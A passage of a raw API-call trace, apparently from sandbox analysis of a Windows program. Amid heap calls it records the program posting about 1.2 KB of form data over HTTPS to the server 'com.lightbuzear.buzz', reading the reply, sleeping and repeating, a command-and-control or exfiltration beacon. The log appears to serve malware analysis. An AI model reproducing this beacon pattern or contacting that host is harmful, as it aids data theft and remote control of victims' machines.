0x4815c50 [0257.402] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0257.402] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815bf0 [0257.402] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0257.402] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0257.402] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bf0 | out: hHeap=0x4780000) returned 1 [0257.402] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815ba8 [0257.402] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0257.402] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0257.402] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0257.403] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0257.403] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0257.403] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0257.403] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0257.403] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0257.403] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0257.403] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0257.403] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0257.403] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0257.403] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0257.404] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0257.404] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c38 [0257.404] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0257.404] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800118 [0257.404] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0257.404] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800118 | out: hHeap=0x4780000) returned 1 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48003c0 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0257.404] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800488 [0257.405] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0257.405] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0257.405] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0257.405] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0257.405] FreeLibrary (hLibModule=0x71780000) returned 1 [0257.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800488 | out: hHeap=0x4780000) returned 1 [0257.406] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0257.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800410 [0257.406] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0257.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0257.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0257.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0257.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0257.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0257.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0257.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0257.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0257.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815bf0 [0257.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800460 [0257.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0257.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0257.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800550 [0257.408] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0257.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800460 [0257.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0257.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0257.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0257.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0257.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0257.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0257.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0257.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0257.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815bc0 [0257.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800078 [0257.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800078 | out: hHeap=0x4780000) returned 1 [0257.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0257.410] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0257.410] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0257.410] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0257.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0257.410] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0257.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0257.410] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0257.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0257.410] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0257.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0257.410] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c38 [0257.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0257.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0257.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0257.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0257.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0257.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800488 [0257.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0257.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0257.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800488 | out: hHeap=0x4780000) returned 1 [0257.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800488 [0257.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0257.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48004d8 [0257.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0257.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0257.412] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0257.412] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0257.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0257.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0257.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0257.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c38 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800528 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0257.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800528 | out: hHeap=0x4780000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800118 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0257.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48004d8 [0257.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0257.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0257.414] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0257.414] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0258.809] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0258.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0258.809] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0258.810] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c38 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48004d8 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0258.810] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800528 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0258.810] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48004d8 [0258.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0258.811] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0258.811] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0258.811] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0258.812] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c38 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c50 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0258.812] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48004d8 [0258.813] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0258.813] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800140 [0258.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0258.813] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48004d8 [0258.813] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0258.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0258.814] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0258.814] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0258.814] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48004d8 | out: hHeap=0x4780000) returned 1 [0258.814] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0258.815] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0258.815] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0258.815] FreeLibrary (hLibModule=0x71570000) returned 1 [0258.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0258.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0258.815] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0258.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800550 | out: hHeap=0x4780000) returned 1 [0258.816] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800410 | out: hHeap=0x4780000) returned 1 [0258.817] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0258.817] Sleep (dwMilliseconds=0x2710) [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0258.826] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0258.826] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0258.826] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0258.826] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0258.826] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b78 [0258.826] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0258.826] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0258.827] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0258.827] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815c20 [0258.827] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0258.827] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0258.827] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0258.827] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0258.827] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0258.827] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6f0 [0258.827] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c38 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b78 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c38 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0258.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0258.828] RtlAllocateHeap 